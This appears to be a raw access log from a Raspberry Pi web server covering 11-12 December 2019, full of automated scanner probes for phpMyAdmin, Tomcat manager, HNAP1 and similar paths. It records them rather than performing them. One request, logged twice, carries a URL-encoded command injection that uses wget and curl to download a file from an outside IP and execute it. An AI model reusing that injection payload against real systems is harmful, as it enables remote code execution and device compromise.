Wed Dec 11 06:25:05 MST 2019 06:25:05 up 4 days, 15:02, 1 user, load average: 0.29, 0.24, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Fri04 5days 4:06 0.54s /usr/bin/lxsession -s LXDE-pi -e LXDE 60.191.52.254 - - [11/Dec/2019:14:24:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 142.93.130.30 - - [11/Dec/2019:15:15:10 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:10 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:11 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:11 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:11 +0000] "GET /php/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:12 +0000] "GET /myadm/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:12 +0000] "GET /SQL/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 142.93.130.30 - - [11/Dec/2019:15:15:12 +0000] "GET /phmyadm/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 60.191.66.222 - - [11/Dec/2019:15:45:24 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 47.240.42.106 - - [11/Dec/2019:16:40:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 91.224.70.110 - - [11/Dec/2019:17:38:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 187.110.210.27 - - [11/Dec/2019:17:51:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 204.19.202.233 - - [11/Dec/2019:18:46:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 162.250.19.7 - - [11/Dec/2019:19:31:55 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [11/Dec/2019:19:32:06 +0000] "GET /ac0xl/logs/2019.12.11 HTTP/1.1" 200 6928 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 103.117.232.53 - - [11/Dec/2019:20:52:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 191.17.57.52 - - [11/Dec/2019:21:07:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 185.100.87.250 - - [11/Dec/2019:21:18:11 +0000] "GET / HTTP/1.0" 200 25000 "" "" 185.100.87.250 - - [11/Dec/2019:21:20:09 +0000] "POST /sdk HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 185.100.87.250 - - [11/Dec/2019:21:20:10 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 185.100.87.250 - - [11/Dec/2019:21:20:10 +0000] "GET /nmaplowercheck1576099207 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 185.100.87.250 - - [11/Dec/2019:21:20:10 +0000] "GET /evox/about HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 185.100.87.250 - - [11/Dec/2019:21:20:11 +0000] "GET /HNAP1 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" 185.100.87.250 - - [11/Dec/2019:21:20:11 +0000] "GET / HTTP/1.0" 200 25000 "" "" 185.100.87.250 - - [11/Dec/2019:21:20:12 +0000] "GET / HTTP/1.1" 200 25000 "" "" 95.133.48.212 - - [11/Dec/2019:23:14:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 111.224.221.175 - - [12/Dec/2019:02:16:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 182.101.61.97 - - [12/Dec/2019:02:16:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 106.45.0.204 - - [12/Dec/2019:02:16:15 +0000] "GET /Main_Login.asp HTTP/1.1" 404 0 "http://162.250.19.7:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 208.97.139.113 - - [12/Dec/2019:02:21:47 +0000] "GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%22%26 HTTP/1.0" 404 0 "" "" 208.97.139.113 - - [12/Dec/2019:02:21:48 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 208.97.139.113 - - [12/Dec/2019:02:22:13 +0000] "GET /awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20curl%20-O%20http%3A%2F%2F145.249.106.241%2Frichard%3B%20chmod%20%2Bx%20richard%3B%20sh%20richard%22%26 HTTP/1.0" 404 0 "" "" 208.97.139.113 - - [12/Dec/2019:02:22:13 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 89.215.233.24 - - [12/Dec/2019:02:39:26 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 71.6.232.9 - - [12/Dec/2019:02:44:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" 107.6.169.250 - - [12/Dec/2019:03:16:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 " 27.54.170.141 - - [12/Dec/2019:05:22:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 94.102.49.193 - - [12/Dec/2019:06:10:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 93.229.112.106 - - [12/Dec/2019:06:12:31 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 404 0 "" "ApiTool" 162.250.19.7 - - [12/Dec/2019:08:10:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Dec/2019:08:10:06 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.3.0) Gecko/68.3.0 Firefox/68.3.0" 162.250.19.7 - - [12/Dec/2019:08:10:11 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Dec/2019:08:10:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Dec/2019:08:10:22 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Dec/2019:08:10:32 +0000] "GET /ac0xl/www/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Dec/2019:08:10:45 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [12/Dec/2019:08:10:45 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Dec/2019:08:11:04 +0000] "GET /ac0xl/logs/2019.12.11 HTTP/1.1" 200 6928 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (Android 4.4.2; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0" 162.250.19.7 - - [12/Dec/2019:08:11:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 54.237.234.82 - - [12/Dec/2019:08:37:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Cloud mapping experiment. Contact research@pdrlabs.net" 54.237.234.82 - - [12/Dec/2019:08:39:13 +0000] "GET /clientaccesspolicy.xml HTTP/1.1" 404 0 "" "Cloud mapping experiment. Contact research@pdrlabs.net" 188.59.105.86 - - [12/Dec/2019:09:34:22 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 198.108.67.112 - - [12/Dec/2019:10:04:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 133.34.149.5 - - [12/Dec/2019:10:05:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 171.67.70.144 - - [12/Dec/2019:10:05:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 171.67.70.128 - - [12/Dec/2019:10:05:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 66.240.244.146 - - [12/Dec/2019:10:05:53 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 139.19.117.1 - - [12/Dec/2019:10:11:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 177.52.26.8 - - [12/Dec/2019:10:11:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 114.143.253.48 - - [12/Dec/2019:10:27:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 129.78.110.128 - - [12/Dec/2019:10:40:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 200.19.156.22 - - [12/Dec/2019:10:56:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 78.20.125.22 - - [12/Dec/2019:11:41:57 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 78.20.125.22 - - [12/Dec/2019:11:41:57 +0000] "GET / HTTP/1.1" 200 25000 "" "" 202.53.147.229 - - [12/Dec/2019:12:15:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 192.141.39.2 - - [12/Dec/2019:13:09:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 61.219.11.153 - - [12/Dec/2019:13:22:50 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" Thu Dec 12 06:25:05 MST 2019 06:25:05 up 5:18, 1 user, load average: 0.52, 0.32, 0.29 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 00:59 7:07m 9.20s 0.31s /usr/bin/lxsession -s LXDE-pi -e LXDE